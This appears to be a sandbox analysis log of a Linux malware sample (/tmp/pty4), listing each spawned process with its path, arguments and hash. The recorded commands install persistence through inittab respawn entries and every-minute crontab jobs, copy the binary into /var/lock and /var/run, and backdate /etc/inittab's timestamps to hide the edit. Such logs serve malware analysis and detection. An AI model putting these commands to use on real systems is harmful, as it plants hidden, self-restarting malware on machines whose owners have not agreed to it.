Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "echo \"0:2345:respawn:/var/tmp/pty4\" >> /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab2 > /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab2 |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "rm -rf /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/rm |
Arguments: | rm -rf /etc/inittab2 |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "touch -acmr /bin/ls /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/touch |
Arguments: | touch -acmr /bin/ls /etc/inittab |
File size: | 100728 bytes |
MD5 hash: | 3859c173f5d3b37be3e531b7c84a9c68 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cp -f /tmp/pty4 /var/lock/pty4" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cp |
Arguments: | cp -f /tmp/pty4 /var/lock/pty4 |
File size: | 153976 bytes |
MD5 hash: | 40f10ae7ea3e44218d1a8c306f79c83f |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "crontab -l | grep /var/lock/pty4 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/lock/pty4 > /dev/null 2>&1 &\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep /var/lock/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v "no cron" |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab | grep -v \"/var/lock/pty4\" > /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:55 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v /var/lock/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:56 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:56 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "echo \"0:2345:respawn:/var/lock/pty4\" >> /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab2 > /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab2 |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "rm -rf /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/rm |
Arguments: | rm -rf /etc/inittab2 |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "touch -acmr /bin/ls /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/touch |
Arguments: | touch -acmr /bin/ls /etc/inittab |
File size: | 100728 bytes |
MD5 hash: | 3859c173f5d3b37be3e531b7c84a9c68 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cp -f /tmp/pty4 /var/run/pty4" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cp |
Arguments: | cp -f /tmp/pty4 /var/run/pty4 |
File size: | 153976 bytes |
MD5 hash: | 40f10ae7ea3e44218d1a8c306f79c83f |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "crontab -l | grep /var/run/pty4 | grep -v \"no cron\" || (crontab -l ; echo \"* * * * * /var/run/pty4 > /dev/null 2>&1 &\") | crontab -" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep /var/run/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v "no cron" |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab -l |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/crontab |
Arguments: | crontab - |
File size: | 43720 bytes |
MD5 hash: | 66e521d421ac9b407699061bf21806f5 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab | grep -v \"/var/run/pty4\" > /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/grep |
Arguments: | grep -v /var/run/pty4 |
File size: | 199136 bytes |
MD5 hash: | 1e6ebb9dd094f774478f72727bdba0f5 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "echo \"0:2345:respawn:/var/run/pty4\" >> /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "cat /etc/inittab2 > /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/cat |
Arguments: | cat /etc/inittab2 |
File size: | 43416 bytes |
MD5 hash: | 7e9d213e404ad3bb82e4ebb2e1f2c1b3 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "rm -rf /etc/inittab2" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/rm |
Arguments: | rm -rf /etc/inittab2 |
File size: | 72056 bytes |
MD5 hash: | aa2b5496fdbfd88e38791ab81f90b95b |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "touch -acmr /bin/ls /etc/inittab" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:57 |
Start date: | 23/12/2021 |
Path: | /usr/bin/touch |
Arguments: | touch -acmr /bin/ls /etc/inittab |
File size: | 100728 bytes |
MD5 hash: | 3859c173f5d3b37be3e531b7c84a9c68 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /tmp/pty4 |
Arguments: | n/a |
File size: | 44884 bytes |
MD5 hash: | 7b4f1c79f1edcb6b36a92debd5a81b96 |
General |
---|
Start time: | 11:26:53 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | sh -c "/bin/uname -n" |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/sh |
Arguments: | n/a |
File size: | 129816 bytes |
MD5 hash: | 1e6b1c887c59a315edb7eb9a315fc84c |
General |
---|
Start time: | 11:26:54 |
Start date: | 23/12/2021 |
Path: | /bin/uname |
Arguments: | /bin/uname -n |
File size: | 39288 bytes |
MD5 hash: | 4ac7c634c5bec95753c480e9d421dcc2 |